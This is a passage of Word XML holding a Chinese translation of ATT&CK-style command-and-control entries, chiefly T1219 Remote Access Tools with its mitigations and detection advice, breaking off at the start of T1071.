        <w:t>检查存在一些在实施之前应该考虑的风险，以避免潜在的安全问题，例如证书验证不完整。在</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL / TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查之后，可能需要额外的加密分析来分析第二层加密。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF5A42" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F6630C" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果恶意软件使用带对称密钥的自定义加密协议，则可以从样本中获取算法和密钥，并使用它们来解码网络流量以检测恶意软件通信签名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F965E36" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F6630C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常，分析网络数据以寻找不常见的数据流（例如，客户端发送的数据明显多于从服务器接收的数据）。利用通常不具有网络通信或从未见过的网络的过程是可疑的。分析数据包内容以检测不遵循正在使用的端口的预期协议行为的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB70AA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程访问工具</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="452DFD22" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19AE1309" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005E1A22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E1A22">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1A22">
              <w:t xml:space="preserve"> T1219</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="461CFBB0" w14:textId="3CE6A254" w:rsidR="00A0413E" w:rsidRPr="005E1A22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1A22">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1A22">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60F06A59" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005E1A22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E1A22">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1A22">
              <w:t xml:space="preserve"> Linux, Windows, macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="022CC941" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005E1A22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E1A22">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1A22">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005E1A22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B316BD4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005E1A22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E1A22">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1A22">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005E1A22">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵检测系统，网络协议分析，进程使用网络，网络监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="020253C0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005E1A22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E53ABE8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="005E1A22" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E1A22">
              <w:t>贡献者</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1A22">
              <w:t>: Matt Kelly, @breakersall</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF6B296" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="005E1A22">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="005E1A22">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1054D6A0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002057E0" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21BA605D" w14:textId="3073420A" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以使用合法的桌面支持和远程访问软件，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Team Viewer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go2Assist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LogMein</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AmmyyAdmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等，来建立网络内目标系统的交互式</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道。这些服务通常用作合法的技术支持软件，并且可以在目标环境中列入白名单。与攻击者常用的其他合法软件相比，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VNC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ammy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Teamviewer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等远程访问工具经常被使用。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060F9805" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在入侵后使用远程访问工具作为冗余访问的备用通信信道，或者作为与目标系统建立交互式远程桌面会话的方式。它们还可以用作恶意软件的组件，以建立反向连接或反向连接到服务或对手控制的系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F47AF31" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A73069" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      </w:pPr>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TeamViewer </w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等管理工具已被多个针对俄罗斯政府和犯罪活动感兴趣的国家</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地区的机构的团体使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C18A732" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="7756"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="6F4E131D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="78D2EC12" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4EB7769C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00A054E0" w14:paraId="70623F4C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21403493" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="372DBAC1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用应用程序白名单来减轻可用于远程访问的未批准软件的安装和使用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00A054E0" w14:paraId="0DDB6088" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="042347DD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>过滤网络流量</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5888A97F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>正确配置防火墙，应用程序防火墙和代理，以限制远程访问工具使用的站点和服务的传出流量。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00A054E0" w14:paraId="079DC3A1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3412EA65" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络入侵防御</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7756" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54B6E5E1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A054E0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A054E0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用网络签名的网络入侵检测和防御系统可能能够阻止到远程访问服务的流量。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A66B7A0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619F618B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00254870" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控与远程管理工具相关的应用程序和流程。</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果合法用户和管理员使用这些工具，则将活动与其他可疑行为相关联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>减少误报。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6E0B55" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00254870" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析不常见数据流的网络数据（例如，客户端发送的数据明显多于从服务器接收的数据）。</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用通常不具有网络通信或从未见过的网络的过程是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容以检测不遵循正在使用的端口的预期协议的应用程序层协议。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB57CB2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002057E0" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Domain Fronting</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结合使用以避免防御。</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能需要将这些远程工具部署和</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或安装到受感染的系统。</w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00254870">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用基于主机的解决方案来检测或阻止这些工具的安装。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0EA27B" w14:textId="6303FC84" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00A0413E" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB378F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>标准应用层协议</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC3074" w:rsidRPr="00A65911" w14:paraId="3FEE0CC8" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B7C4B81" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1071</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A6999C2" w14:textId="6FA4A78F" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="703C9817" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FA3AAC8" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：网络抓包，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术网络流分析，网络进程使用，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>恶意</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>软件反向工程</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24DBA163" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18CB0791" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A6D3CF5" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC856D9" w14:textId="77777777" w:rsidR="00BC3074" w:rsidRPr="00A65911" w:rsidRDefault="00BC3074" w:rsidP="00BC3074">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>攻击者可能会基于常见的标准化应用程序层协议（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
